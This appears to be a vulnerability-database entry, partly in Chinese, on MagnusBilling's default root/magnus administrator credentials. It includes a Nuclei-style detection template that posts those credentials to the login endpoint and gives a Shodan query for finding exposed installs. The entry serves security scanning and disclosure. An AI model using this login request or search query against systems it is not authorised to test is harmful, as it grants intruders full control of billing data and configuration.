magnusbilling-default-login: MagnusBilling - Default Login

日期: 2025-08-01 | 影响软件: MagnusBilling | POC: 已公开

漏洞描述

MagnusBilling installs with a default administrative account using the credentials root / magnus. If unchanged, these credentials grant full access to the system, allowing attackers to manage billing data, modify configurations, and potentially execute arbitrary code or commands via exposed interfaces.

PoC代码[已公开]

id: magnusbilling-default-login

info:
  name: MagnusBilling - Default Login
  author: DhiyaneshDk
  severity: high
  description: |
    MagnusBilling installs with a default administrative account using the credentials root / magnus. If unchanged, these credentials grant full access to the system, allowing attackers to manage billing data, modify configurations, and potentially execute arbitrary code or commands via exposed interfaces.
  impact: |
    An unauthenticated attacker can gain full administrative control over the MagnusBilling platform, leading to compromise of billing systems, data leakage, and potential pivoting into internal infrastructure.
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"MagnusBilling"
  tags: mbilling,default-login,vuln

variables:
  username: "root"
  password: "9F4CA770B638615AC5C3E0D2DA16B77C80C2F2C6"   # magnus

http:
  - raw:
      - |
        POST /mbilling/index.php/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user={{username}}&password={{password}}&key=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":"root"'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022033fd0b1fed1ce2bf606d6dcd49da469baa4c7a6f13bf9d615504c8de2c9b464202210090d2dfcb3a93c558823426efa277835f9bc76413f9a43117b53270c0e647e7b3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐